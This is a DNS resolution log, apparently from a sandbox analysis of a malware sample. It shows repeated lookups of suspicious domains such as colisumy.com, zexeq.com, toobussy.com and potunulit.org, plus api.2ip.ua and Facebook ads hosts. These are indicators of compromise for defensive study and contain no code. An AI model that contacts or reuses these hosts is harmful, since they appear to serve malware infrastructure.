                                                                                                                            May 28, 2023 10:43:08.879879951 CEST8.8.8.8192.168.2.30xda79No error (0)colisumy.com187.245.185.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.879879951 CEST8.8.8.8192.168.2.30xda79No error (0)colisumy.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.879879951 CEST8.8.8.8192.168.2.30xda79No error (0)colisumy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.879879951 CEST8.8.8.8192.168.2.30xda79No error (0)colisumy.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.879879951 CEST8.8.8.8192.168.2.30xda79No error (0)colisumy.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.879879951 CEST8.8.8.8192.168.2.30xda79No error (0)colisumy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.879879951 CEST8.8.8.8192.168.2.30xda79No error (0)colisumy.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.879879951 CEST8.8.8.8192.168.2.30xda79No error (0)colisumy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:08.879879951 CEST8.8.8.8192.168.2.30xda79No error (0)colisumy.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:09.484451056 CEST8.8.8.8192.168.2.30x8697No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:09.736618042 CEST8.8.8.8192.168.2.30x3a74No error (0)colisumy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:09.736618042 CEST8.8.8.8192.168.2.30x3a74No error (0)colisumy.com187.245.185.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:09.736618042 CEST8.8.8.8192.168.2.30x3a74No error (0)colisumy.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:09.736618042 CEST8.8.8.8192.168.2.30x3a74No error (0)colisumy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:09.736618042 CEST8.8.8.8192.168.2.30x3a74No error (0)colisumy.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:09.736618042 CEST8.8.8.8192.168.2.30x3a74No error (0)colisumy.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:09.736618042 CEST8.8.8.8192.168.2.30x3a74No error (0)colisumy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:09.736618042 CEST8.8.8.8192.168.2.30x3a74No error (0)colisumy.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:09.736618042 CEST8.8.8.8192.168.2.30x3a74No error (0)colisumy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:09.736618042 CEST8.8.8.8192.168.2.30x3a74No error (0)colisumy.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:10.580411911 CEST8.8.8.8192.168.2.30x1df7No error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:10.580411911 CEST8.8.8.8192.168.2.30x1df7No error (0)zexeq.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:10.580411911 CEST8.8.8.8192.168.2.30x1df7No error (0)zexeq.com5.163.228.78A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:10.580411911 CEST8.8.8.8192.168.2.30x1df7No error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:10.580411911 CEST8.8.8.8192.168.2.30x1df7No error (0)zexeq.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:10.580411911 CEST8.8.8.8192.168.2.30x1df7No error (0)zexeq.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:10.580411911 CEST8.8.8.8192.168.2.30x1df7No error (0)zexeq.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:10.580411911 CEST8.8.8.8192.168.2.30x1df7No error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:10.580411911 CEST8.8.8.8192.168.2.30x1df7No error (0)zexeq.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:10.580411911 CEST8.8.8.8192.168.2.30x1df7No error (0)zexeq.com211.59.14.90A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:11.301954031 CEST8.8.8.8192.168.2.30x7c33No error (0)zexeq.com211.59.14.90A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:11.301954031 CEST8.8.8.8192.168.2.30x7c33No error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:11.301954031 CEST8.8.8.8192.168.2.30x7c33No error (0)zexeq.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:11.301954031 CEST8.8.8.8192.168.2.30x7c33No error (0)zexeq.com5.163.228.78A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:11.301954031 CEST8.8.8.8192.168.2.30x7c33No error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:11.301954031 CEST8.8.8.8192.168.2.30x7c33No error (0)zexeq.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:11.301954031 CEST8.8.8.8192.168.2.30x7c33No error (0)zexeq.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:11.301954031 CEST8.8.8.8192.168.2.30x7c33No error (0)zexeq.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:11.301954031 CEST8.8.8.8192.168.2.30x7c33No error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:11.301954031 CEST8.8.8.8192.168.2.30x7c33No error (0)zexeq.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.095798016 CEST8.8.8.8192.168.2.30xac40No error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.095798016 CEST8.8.8.8192.168.2.30xac40No error (0)zexeq.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.095798016 CEST8.8.8.8192.168.2.30xac40No error (0)zexeq.com5.163.228.78A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.095798016 CEST8.8.8.8192.168.2.30xac40No error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.095798016 CEST8.8.8.8192.168.2.30xac40No error (0)zexeq.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.095798016 CEST8.8.8.8192.168.2.30xac40No error (0)zexeq.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.095798016 CEST8.8.8.8192.168.2.30xac40No error (0)zexeq.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.095798016 CEST8.8.8.8192.168.2.30xac40No error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.095798016 CEST8.8.8.8192.168.2.30xac40No error (0)zexeq.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.095798016 CEST8.8.8.8192.168.2.30xac40No error (0)zexeq.com211.59.14.90A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.700383902 CEST8.8.8.8192.168.2.30xe9cNo error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.700383902 CEST8.8.8.8192.168.2.30xe9cNo error (0)zexeq.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.700383902 CEST8.8.8.8192.168.2.30xe9cNo error (0)zexeq.com5.163.228.78A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.700383902 CEST8.8.8.8192.168.2.30xe9cNo error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.700383902 CEST8.8.8.8192.168.2.30xe9cNo error (0)zexeq.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.700383902 CEST8.8.8.8192.168.2.30xe9cNo error (0)zexeq.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.700383902 CEST8.8.8.8192.168.2.30xe9cNo error (0)zexeq.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.700383902 CEST8.8.8.8192.168.2.30xe9cNo error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.700383902 CEST8.8.8.8192.168.2.30xe9cNo error (0)zexeq.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:12.700383902 CEST8.8.8.8192.168.2.30xe9cNo error (0)zexeq.com211.59.14.90A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:14.518148899 CEST8.8.8.8192.168.2.30xe7f0No error (0)potunulit.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:14.518148899 CEST8.8.8.8192.168.2.30xe7f0No error (0)potunulit.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:14.872251987 CEST8.8.8.8192.168.2.30x9473No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:15.519408941 CEST8.8.8.8192.168.2.30x6efcNo error (0)speedlab.com.eg217.174.148.28A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:15.636708021 CEST8.8.8.8192.168.2.30xfbcaNo error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:16.004530907 CEST8.8.8.8192.168.2.30x5091No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:16.510293007 CEST8.8.8.8192.168.2.30xd095No error (0)colisumy.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:16.510293007 CEST8.8.8.8192.168.2.30xd095No error (0)colisumy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:16.510293007 CEST8.8.8.8192.168.2.30xd095No error (0)colisumy.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:16.510293007 CEST8.8.8.8192.168.2.30xd095No error (0)colisumy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:16.510293007 CEST8.8.8.8192.168.2.30xd095No error (0)colisumy.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:16.510293007 CEST8.8.8.8192.168.2.30xd095No error (0)colisumy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:16.510293007 CEST8.8.8.8192.168.2.30xd095No error (0)colisumy.com187.245.185.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:16.510293007 CEST8.8.8.8192.168.2.30xd095No error (0)colisumy.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:16.510293007 CEST8.8.8.8192.168.2.30xd095No error (0)colisumy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:16.510293007 CEST8.8.8.8192.168.2.30xd095No error (0)colisumy.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:16.671541929 CEST8.8.8.8192.168.2.30xca04No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:17.017462015 CEST8.8.8.8192.168.2.30x450dNo error (0)colisumy.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:17.017462015 CEST8.8.8.8192.168.2.30x450dNo error (0)colisumy.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:17.017462015 CEST8.8.8.8192.168.2.30x450dNo error (0)colisumy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:17.017462015 CEST8.8.8.8192.168.2.30x450dNo error (0)colisumy.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:17.017462015 CEST8.8.8.8192.168.2.30x450dNo error (0)colisumy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:17.017462015 CEST8.8.8.8192.168.2.30x450dNo error (0)colisumy.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:17.017462015 CEST8.8.8.8192.168.2.30x450dNo error (0)colisumy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:17.017462015 CEST8.8.8.8192.168.2.30x450dNo error (0)colisumy.com187.245.185.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:17.017462015 CEST8.8.8.8192.168.2.30x450dNo error (0)colisumy.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:17.017462015 CEST8.8.8.8192.168.2.30x450dNo error (0)colisumy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:18.501964092 CEST8.8.8.8192.168.2.30x1f9bNo error (0)potunulit.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:18.501964092 CEST8.8.8.8192.168.2.30x1f9bNo error (0)potunulit.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:18.790283918 CEST8.8.8.8192.168.2.30x2085No error (0)colisumy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:18.790283918 CEST8.8.8.8192.168.2.30x2085No error (0)colisumy.com187.245.185.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:18.790283918 CEST8.8.8.8192.168.2.30x2085No error (0)colisumy.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:18.790283918 CEST8.8.8.8192.168.2.30x2085No error (0)colisumy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:18.790283918 CEST8.8.8.8192.168.2.30x2085No error (0)colisumy.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:18.790283918 CEST8.8.8.8192.168.2.30x2085No error (0)colisumy.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:18.790283918 CEST8.8.8.8192.168.2.30x2085No error (0)colisumy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:18.790283918 CEST8.8.8.8192.168.2.30x2085No error (0)colisumy.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:18.790283918 CEST8.8.8.8192.168.2.30x2085No error (0)colisumy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:18.790283918 CEST8.8.8.8192.168.2.30x2085No error (0)colisumy.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:19.477701902 CEST8.8.8.8192.168.2.30x3028No error (0)adsmanager.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:19.477701902 CEST8.8.8.8192.168.2.30x3028No error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:19.477701902 CEST8.8.8.8192.168.2.30x3028No error (0)star.c10r.facebook.com157.240.17.17A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:19.903872013 CEST8.8.8.8192.168.2.30x1826No error (0)zexeq.com5.163.228.78A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:19.903872013 CEST8.8.8.8192.168.2.30x1826No error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:19.903872013 CEST8.8.8.8192.168.2.30x1826No error (0)zexeq.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:19.903872013 CEST8.8.8.8192.168.2.30x1826No error (0)zexeq.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:19.903872013 CEST8.8.8.8192.168.2.30x1826No error (0)zexeq.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:19.903872013 CEST8.8.8.8192.168.2.30x1826No error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:19.903872013 CEST8.8.8.8192.168.2.30x1826No error (0)zexeq.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:19.903872013 CEST8.8.8.8192.168.2.30x1826No error (0)zexeq.com211.59.14.90A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:19.903872013 CEST8.8.8.8192.168.2.30x1826No error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:19.903872013 CEST8.8.8.8192.168.2.30x1826No error (0)zexeq.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.248779058 CEST8.8.8.8192.168.2.30xad6cNo error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.248779058 CEST8.8.8.8192.168.2.30xad6cNo error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.248779058 CEST8.8.8.8192.168.2.30xad6cNo error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.248779058 CEST8.8.8.8192.168.2.30xad6cNo error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.248779058 CEST8.8.8.8192.168.2.30xad6cNo error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.248779058 CEST8.8.8.8192.168.2.30xad6cNo error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.248779058 CEST8.8.8.8192.168.2.30xad6cNo error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.248779058 CEST8.8.8.8192.168.2.30xad6cNo error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.248779058 CEST8.8.8.8192.168.2.30xad6cNo error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.248779058 CEST8.8.8.8192.168.2.30xad6cNo error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.732796907 CEST8.8.8.8192.168.2.30xa0b6No error (0)zexeq.com5.163.228.78A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.732796907 CEST8.8.8.8192.168.2.30xa0b6No error (0)zexeq.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.732796907 CEST8.8.8.8192.168.2.30xa0b6No error (0)zexeq.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.732796907 CEST8.8.8.8192.168.2.30xa0b6No error (0)zexeq.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.732796907 CEST8.8.8.8192.168.2.30xa0b6No error (0)zexeq.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.732796907 CEST8.8.8.8192.168.2.30xa0b6No error (0)zexeq.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.732796907 CEST8.8.8.8192.168.2.30xa0b6No error (0)zexeq.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.732796907 CEST8.8.8.8192.168.2.30xa0b6No error (0)zexeq.com211.59.14.90A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.732796907 CEST8.8.8.8192.168.2.30xa0b6No error (0)zexeq.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.732796907 CEST8.8.8.8192.168.2.30xa0b6No error (0)zexeq.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.846388102 CEST8.8.8.8192.168.2.30x9518No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:20.846388102 CEST8.8.8.8192.168.2.30x9518No error (0)star-mini.c10r.facebook.com157.240.9.35A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:22.043874979 CEST8.8.8.8192.168.2.30x3f8aNo error (0)potunulit.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:22.043874979 CEST8.8.8.8192.168.2.30x3f8aNo error (0)potunulit.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:22.132613897 CEST8.8.8.8192.168.2.30xe689No error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:22.132613897 CEST8.8.8.8192.168.2.30xe689No error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:22.132613897 CEST8.8.8.8192.168.2.30xe689No error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:22.132613897 CEST8.8.8.8192.168.2.30xe689No error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:22.132613897 CEST8.8.8.8192.168.2.30xe689No error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:22.132613897 CEST8.8.8.8192.168.2.30xe689No error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:22.132613897 CEST8.8.8.8192.168.2.30xe689No error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:22.132613897 CEST8.8.8.8192.168.2.30xe689No error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:22.132613897 CEST8.8.8.8192.168.2.30xe689No error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:22.132613897 CEST8.8.8.8192.168.2.30xe689No error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:22.417212963 CEST8.8.8.8192.168.2.30xa2dNo error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:22.796928883 CEST8.8.8.8192.168.2.30xe43No error (0)ss.apjeoighw.com154.221.31.191A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:23.615879059 CEST8.8.8.8192.168.2.30x5e33No error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:23.615879059 CEST8.8.8.8192.168.2.30x5e33No error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:23.615879059 CEST8.8.8.8192.168.2.30x5e33No error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:23.615879059 CEST8.8.8.8192.168.2.30x5e33No error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:23.615879059 CEST8.8.8.8192.168.2.30x5e33No error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:23.615879059 CEST8.8.8.8192.168.2.30x5e33No error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:23.615879059 CEST8.8.8.8192.168.2.30x5e33No error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:23.615879059 CEST8.8.8.8192.168.2.30x5e33No error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:23.615879059 CEST8.8.8.8192.168.2.30x5e33No error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:23.615879059 CEST8.8.8.8192.168.2.30x5e33No error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:23.970146894 CEST8.8.8.8192.168.2.30x4fc2No error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:24.216830015 CEST8.8.8.8192.168.2.30x30c4No error (0)colisumy.com211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:24.216830015 CEST8.8.8.8192.168.2.30x30c4No error (0)colisumy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:24.216830015 CEST8.8.8.8192.168.2.30x30c4No error (0)colisumy.com201.124.33.177A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:24.216830015 CEST8.8.8.8192.168.2.30x30c4No error (0)colisumy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:24.216830015 CEST8.8.8.8192.168.2.30x30c4No error (0)colisumy.com211.40.39.251A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:24.216830015 CEST8.8.8.8192.168.2.30x30c4No error (0)colisumy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:24.216830015 CEST8.8.8.8192.168.2.30x30c4No error (0)colisumy.com187.245.185.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:24.216830015 CEST8.8.8.8192.168.2.30x30c4No error (0)colisumy.com211.119.84.111A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:24.216830015 CEST8.8.8.8192.168.2.30x30c4No error (0)colisumy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:24.216830015 CEST8.8.8.8192.168.2.30x30c4No error (0)colisumy.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:25.163640022 CEST8.8.8.8192.168.2.30x5cc3No error (0)toobussy.com222.236.49.123A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:25.163640022 CEST8.8.8.8192.168.2.30x5cc3No error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:25.163640022 CEST8.8.8.8192.168.2.30x5cc3No error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:25.163640022 CEST8.8.8.8192.168.2.30x5cc3No error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:25.163640022 CEST8.8.8.8192.168.2.30x5cc3No error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:25.163640022 CEST8.8.8.8192.168.2.30x5cc3No error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:25.163640022 CEST8.8.8.8192.168.2.30x5cc3No error (0)toobussy.com109.98.58.98A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:25.163640022 CEST8.8.8.8192.168.2.30x5cc3No error (0)toobussy.com175.126.109.15A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:25.163640022 CEST8.8.8.8192.168.2.30x5cc3No error (0)toobussy.com175.120.254.9A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:25.163640022 CEST8.8.8.8192.168.2.30x5cc3No error (0)toobussy.com183.100.39.157A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:26.496707916 CEST8.8.8.8192.168.2.30x36acNo error (0)toobussy.com175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:26.496707916 CEST8.8.8.8192.168.2.30x36acNo error (0)toobussy.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:26.496707916 CEST8.8.8.8192.168.2.30x36acNo error (0)toobussy.com37.34.248.24A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:26.496707916 CEST8.8.8.8192.168.2.30x36acNo error (0)toobussy.com80.210.25.252A (IP address)IN (0x0001)false
                                                                                                                            May 28, 2023 10:43:26.496707916 CEST8.8.8.8192.168.2.30x36acNo error (0)toobussy.com222.236.49.124A (IP address)IN (0x0001)false
